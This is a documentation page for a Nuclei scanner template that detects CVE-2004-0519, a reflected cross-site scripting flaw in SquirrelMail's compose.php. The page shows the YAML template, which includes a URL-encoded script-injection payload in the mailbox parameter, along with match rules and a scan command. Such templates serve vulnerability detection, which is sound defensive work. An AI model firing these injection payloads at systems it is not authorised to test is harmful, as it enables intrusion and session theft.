SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
ID: CVE-2004-0519
Severity: medium
Author: dhiyaneshDk
Tags: cve,cve2004,squirrelmail,edb,xss,sgi
Description
Section titled “Description”Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
YAML Source
Section titled “YAML Source”id: CVE-2004-0519
info: name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting author: dhiyaneshDk severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface. remediation: Upgrade to the latest version. reference: - https://www.exploit-db.com/exploits/24068 - http://security.gentoo.org/glsa/glsa-200405-16.xml - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc - http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858 - http://marc.info/?l=bugtraq&m=108334862800260 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2004-0519 cwe-id: NVD-CWE-Other epss-score: 0.02285 epss-percentile: 0.89406 cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sgi product: propack tags: cve,cve2004,squirrelmail,edb,xss,sgi
http: - method: GET path: - '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and matchers: - type: word part: body words: - "</script><script>alert(document.domain)</script>"
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a00473045022100f78a8d897aa28c0c47112280df68043e3ff141b97b1a05aca36af43e614a114c02206f9ef394ee110452db0e12dd95668fd175fb2a7d5f152ebf8b194cab0eebaf9a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2004/CVE-2004-0519.yaml"